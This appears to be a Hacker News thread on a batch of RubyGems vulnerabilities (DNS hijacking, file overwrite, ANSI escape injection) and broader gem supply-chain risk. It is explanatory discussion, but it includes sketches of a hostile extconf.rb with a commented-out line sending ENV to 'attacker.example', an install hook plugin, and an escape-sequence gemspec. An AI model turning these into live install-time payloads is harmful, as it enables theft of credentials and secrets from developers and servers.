I don't really get the fuss about this one. It's annoying and a vector, true, but keep in mind that even with this fixed, a malicious gem can overwrite arbitrary files. A gem can bring a C extension with it, and that extension is compiled with a Makefile generated by the gem-provided extconf.rb. AFAIK, extconf.rb is executed at gem install time, so arbitrary code can already run at install time.
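To make that concrete, here's a minimal sketch of what a hostile extconf.rb could look like; the gem name and the commented-out payload URL are made up, but running Ruby at install time to generate the Makefile is just how native extensions get built:

    # extconf.rb: executed by `gem install` before the C extension compiles
    require 'mkmf'
    require 'net/http'

    # Anything here runs with the installing user's privileges.
    # Hypothetical payload: exfiltrate the environment, like the npm
    # incident mentioned elsewhere in this thread.
    # Net::HTTP.post_form(URI('https://attacker.example/collect'), ENV.to_h)

    create_makefile('innocent_ext')  # the legitimate-looking part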
Edit: Or, if you want to get a little more creative, have your gem include a plugin to rubygems itself, similar to what https://github.com/rvm/executable-hooks does.
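For the curious, a rough sketch of such a plugin (the file name is the real convention RubyGems looks for; the body is a placeholder, not anything executable-hooks actually does):

    # lib/rubygems_plugin.rb: RubyGems loads any installed file with this
    # name every time the `gem` command itself runs.
    Gem.post_install do |installer|
      # Fires after *every* subsequent gem install, not just this gem's.
      warn "hooked install of #{installer.spec.full_name}"  # stand-in payload
    end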
I agree. Or how about one step past installation? Once you load a gem it can do whatever the hell it wants to your system. This vulnerability feels very security-theater-ish. At the end of the day, someone needs to audit the gem or have deep trust in the supplying party (e.g. Rails) to protect against arbitrary file manipulation.
Installation and running are not necessarily done with the same account. Often, apps run with lower privileges than they're installed with, so the damage may be somewhat mitigated. I'd really treat that as a separate, albeit related problem.
The only difference is that you're perhaps more likely to install a gem system-wide (which normally requires root) than to run code from a locally installed gem as root.
I don't quite understand how this is different from the status quo? I guess gems may (sometimes) be installed with a different user (or even root) than the application server?
But even if: most systems today probably only run that one service, and the application server can rwx pretty much everything of interest because that's its job, right?
10 years or so ago you'd often see some company's server running apache as well as a mail server, the internal document repository and the financial systems. In that sort of setup, it's important to (try to) keep these systems isolated from each other. But today, all that root access would give you is the ability to read a few more Ubuntu man pages.
I wouldn't be so optimistic. There are often credentials to other systems (like databases, etc) on such servers, plus they now have access to the private network(s) the compromised server resides on. It gives the attacker the opportunity to serve exploits to users, to forward incoming requests from users to external servers (maybe there's an auth token or something they can use), and tons of other stuff.
Yep. Even if you only owned a perfectly sterile (no secrets) proxy tier in front of a distinct service tier, you'd be sitting in the path of requests from clients to those services and could extract credentials (passwords, tokens) or PII (names, emails), which would still be unacceptable.
> and the application server can rwx pretty much everything of interest because that's its job, right?
Eh, I don't know about that. I don't think most application servers are running as root, and I'm pretty sure it's considered bad practice to run them as root, no?
But yeah, they still need to have enough privs to do their jobs, which will be a lot of privs. But you still don't go from that to "might as well just run as root then".
Developer machines could be as interesting as servers, maybe more. If they can install a keylogger using a malicious or hijacked gem, then bingo!
The file overwrite and the ANSI escape sequence vulnerabilities are extra attack vectors. The main one has always been the code itself and its vetting process. That goes for Ruby gems and for any other open or closed source code we run on our machines, starting from the processor microcode.
There was recently a fiasco with NPM over a malicious node package whose name was an intentional typo of a popular package, and upon installation it exfiltrated all environment variables:
https://twitter.com/o_cee/status/892306836199800836
After this got uncovered, Duo published a blog post where they scanned for and found several other malicious packages.
Well, an existing gem might not. But the developer of a gem you use could have their computer compromised, and the attacker could publish a malicious update. If you inadvertently download it while updating your gems, you could be compromised too.
The problem here is that you don't even have to get directly attacked to be affected.
Well it's a web of trust: typically people only trust their Gemfile, not their entire Gemfile.lock. If you audit the latter you should be fine (though of course you should upgrade regardless).
I went through all 4 issues and did a brief writeup for each of them. Only the first 2 issues are serious (and worth upgrading for). The last 2 issues are not really a big deal at all.
1) "a DNS request hijacking vulnerability"
Rubygems supports a gem server discovery mechanism: if you set your gem source to 'https://example.com', the gem client does an SRV DNS lookup on "_rubygems._tcp.example.com" to determine where it should send requests.

A MITM can intercept that DNS request and return whatever server they want, forcing the gem client to download code from a malicious server.
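Roughly, the lookup looks like this (a simplified sketch, not the actual RubyGems code):

    require 'resolv'
    require 'uri'

    source   = URI('https://example.com')
    srv_name = "_rubygems._tcp.#{source.host}"

    # An unauthenticated DNS answer decides which host the client trusts,
    # so whoever can spoof this response redirects all gem traffic.
    records = Resolv::DNS.open do |dns|
      dns.getresources(srv_name, Resolv::DNS::Resource::IN::SRV)
    end
    api_host = records.empty? ? source.host : records.first.target.to_s
    puts "gem requests go to: #{api_host}"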
2) "a vulnerability in the gem installer that allowed a malicious gem to overwrite arbitrary files"

The gem's name gets spliced into filesystem paths during installation, so (IIRC) a crafted name containing traversal sequences like "../" could write files outside the install directory. Now gem names can only contain letters, numbers, underscore (_), dash (-), and dot (.).
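My rough approximation of the resulting check (not the exact RubyGems code, just the idea):

    VALID_NAME = /\A[a-zA-Z0-9_.\-]+\z/

    def valid_gem_name?(name)
      # Rejects names like "../../../etc/passwd" that could previously be
      # spliced into filesystem paths during install.
      !!(name =~ VALID_NAME)
    end

    valid_gem_name?('rails')            # => true
    valid_gem_name?('../../tmp/evil')   # => false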
3) "an ANSI escape sequence vulnerability"
Text specified in a gemspec can be output on installation or displayed when showing information about the gem. Gem authors can inject terminal escape sequences into (for instance) the authors field of the gem, and this will mess with end users' terminals.
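As an illustration, a gemspec along these lines (entirely hypothetical) would clear the screen and print red text on any terminal that renders the field raw:

    # evil.gemspec: the escape bytes in `authors` hit the user's terminal
    # whenever the field is printed (e.g. in `gem install` output).
    Gem::Specification.new do |s|
      s.name    = 'evil'
      s.version = '1.0.0'
      s.summary = 'looks harmless'
      s.authors = ["\e[2J\e[1;31mpwned\e[0m"]  # clear screen, then red text
    end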
I'm sure this has been brought up before, but I think HN should have a special tab where submissions like this get pinned: important stories where people need to take action, such as security holes or political events (e.g. net neutrality).
People in such responsible positions are on the respective announcement mailing lists anyway, and read about those events (and patch their systems and/or take other measures) long before the story is upvoted on HN.
For example, every administrator of Debian systems is expected to be subscribed to the "debian-security-announce" mailing list.
Also, everyone who is interested or active in German net politics is subscribed to the "netzpolitik.org" RSS feed, or visits that site regularly.
Waiting until such a story hits HN and relying on that seems highly dubious to me. As soon as any important story hits social media (such as Twitter, Reddit or HN), all important measures have already been taken. HN is really the end stage here, not the beginning. It is the reaction, not the initiative.
In short: Use the real network and connect directly to the relevant groups. Don't rely on aggregation networks.
(BTW, isn't it almost comical that the latter, rather than the former, are called "social" networks?)
You're right in theory, but I've seen numerous people in important positions on FOSS and closed-source projects only start addressing a problem after it has "gone viral" on HN.
Don't overestimate people; most devs and managers would look the other way if their security issue doesn't get much internet attention. If they notice a report on HN they kind of panic and go into damage-control mode, and then maybe actually fix the issue itself as well.
Being vocal on a popular and respected forum like HN is important for getting critical issues the attention they need.
Please note: I don't like that this is the truth, but alas, I guess this is how Homo sapiens works: it's not important whether you know you screwed up; you can bullsh*t yourself into oblivion and delude your conscience, but once many people know about your screw-up, then you suddenly care.
Given the hands-off approach, the PR concerns, and the fact that they have a healthy community of tech-minded people on here from which to recruit, I find it unlikely that they would do anything perceived as too alienating to anyone.
There's been tons of suggestions about site improvements (much smaller ones, mind you) that have never gained any attention.
Such vulnerabilities would usually only impact a portion of users, and I hope the affected people have more reliable ways to keep up to date with vulnerabilities than HN...
Yeeks. Not good.
(sudo) gem update --system ASAP
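And to confirm the update took (assuming 2.6.13 is the patched release, going by the announcement):

    gem --version   # expect 2.6.13 or later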